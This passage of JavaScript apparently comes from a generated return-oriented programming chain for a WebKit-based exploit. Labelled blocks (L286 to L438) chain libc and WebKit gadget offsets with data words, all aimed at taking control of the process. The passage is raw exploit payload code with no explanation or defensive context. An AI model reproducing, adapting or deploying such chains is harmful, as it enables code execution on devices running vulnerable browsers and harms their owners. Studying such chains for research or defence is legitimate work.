libc_base+144605 //pop rdi
]);
//L286:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+77544, //L288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+77560, //L289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77528, //L287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L287:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L288:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L289:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+77720, //L293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+77688, //L291
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77704, //L292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L290:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L291:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L292:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L293:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+77776, //L295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L295:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+77904, //L297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+77920, //L298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+77888, //L296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L296:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L297:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L298:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+78000, //L299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+78016, //L300
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L299:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L300:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+78104, //L301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+78120, //L303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L301:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L303:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L304:
db([4294967283, 4294967295]); // -0xd
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+1121481, //mov [rax], cl
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L306:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+78280, //L309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+78264, //L307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L307:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L309:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+78424, //L312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+78392, //L310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+78408, //L311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L310:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L311:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L312:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+78496, //L314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L314:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+78552, //L315
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L315:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+78632, //L317
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L317:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L319:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+78752, //L322
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+78736, //L320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L320:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L322:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+78928, //L325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+78944, //L326
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+78896, //L323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+78912, //L324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L323:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L324:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L325:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L326:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+79056, //L327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+79088, //L329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+79072, //L328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L327:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L328:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L329:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+79176, //L331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L331:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+79232, //L332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L332:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+79376, //L335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+79392, //L336
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+79360, //L334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L334:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L335:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L336:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+79552, //L340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+79520, //L338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+79536, //L339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L337:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L338:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L339:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L340:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+79608, //L342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L342:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+79736, //L344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+79752, //L345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+79720, //L343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L343:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L344:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L345:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+79912, //L349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+79880, //L347
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+79896, //L348
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L346:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L347:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L348:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L349:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+79968, //L351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L351:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+80096, //L353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+80112, //L354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80080, //L352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L352:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L353:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L354:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+80272, //L358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+80240, //L356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80256, //L357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L355:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L356:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L357:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L358:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+80328, //L360
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L360:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+80456, //L362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+80472, //L363
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80440, //L361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L361:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L362:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L363:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+80552, //L364
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+80568, //L365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L364:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L365:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+80728, //L369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+80696, //L367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80712, //L368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L366:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L367:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L368:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L369:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+80784, //L371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L371:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+80912, //L373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+80928, //L374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+80896, //L372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L372:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L373:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L374:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+81024, //L376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+81008, //L375
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L375:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L376:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+81104, //L377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L377:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L379:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+81224, //L382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+81208, //L380
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L380:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L382:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+81368, //L385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+81336, //L383
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+81352, //L384
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L383:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L384:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L385:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+81440, //L387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L387:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+81496, //L388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L388:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L390:
db([7, 0]); // 0x7
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+81624, //L391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L391:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L393:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+81744, //L396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+81728, //L394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L394:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L396:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+81920, //L399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+81936, //L400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+81888, //L397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+81904, //L398
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L397:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L398:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L399:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L400:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+82048, //L401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+82080, //L403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+82064, //L402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L401:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L402:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L403:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+82192, //L404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+82208, //L405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L404:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L405:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+82296, //L407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L407:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+82352, //L408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L408:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+82424, //L411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L411:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+82480, //L412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L412:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+82568, //L414
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L414:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L416:
db([4294967283, 4294967295]); // -0xd
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+82688, //L419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+82672, //L417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L417:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L419:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+82848, //L423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+82816, //L421
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+82832, //L422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L420:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L421:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L422:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L423:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+82904, //L425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L425:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+83032, //L427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+83048, //L428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83016, //L426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L426:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L427:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L428:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+83208, //L432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+83176, //L430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83192, //L431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L429:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L430:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L431:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L432:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+83264, //L434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L434:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+83392, //L436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+83408, //L437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+83376, //L435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L435:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L436:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L437:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+83488, //L438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+83504, //L439
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L438:
